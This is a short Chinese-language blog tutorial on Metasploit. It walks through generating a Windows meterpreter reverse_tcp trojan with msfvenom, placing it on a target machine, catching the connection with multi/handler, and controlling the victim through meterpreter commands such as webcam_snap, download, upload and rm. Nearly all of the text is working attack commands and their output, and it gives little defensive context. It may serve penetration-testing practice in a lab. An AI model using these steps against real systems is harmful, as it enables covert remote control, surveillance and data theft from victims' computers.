msfconsole

First Post:

Last Update:

【工具使用】——Metasploit(MSF)使用详解(超详细)_剑客 getshell的博客-CSDN博客

首先两台设备需要ping通

木马生成:

1
2
3
4
5
- sudo su
- msfconsole

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<本地ip(kali)> LPORT=<本地端口号(随便写)> –f exe –o <文件名>.exe

在根目录下找到该文件,放在靶机上 192.168.81.93

设置参数

1
2
3
4
5
6
7
8
9
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.238(kali ip,桥接模式)
lhost => 192.168.81.93
msf5 exploit(multi/handler) > set lport 20004(刚刚自己设置的端口)
lport => 20004
msf5 exploit(multi/handler) > exploit -z -j(后台执行)

接下来在靶机执行木马程序

1
2
3
msf exploit(handler) > sessions(查看上钩的用户)

msf exploit(handler) > sessions -i 1(选择需要攻击的用户,这里选择第 1 个)

image-20230625235640090

出现meterpreter >让你输入就是成功控制了(这玩意提权也行)

image-20230625235716067

看帮助文档,命令help

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
cmd指令:
webcam_snap 拍照片

cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程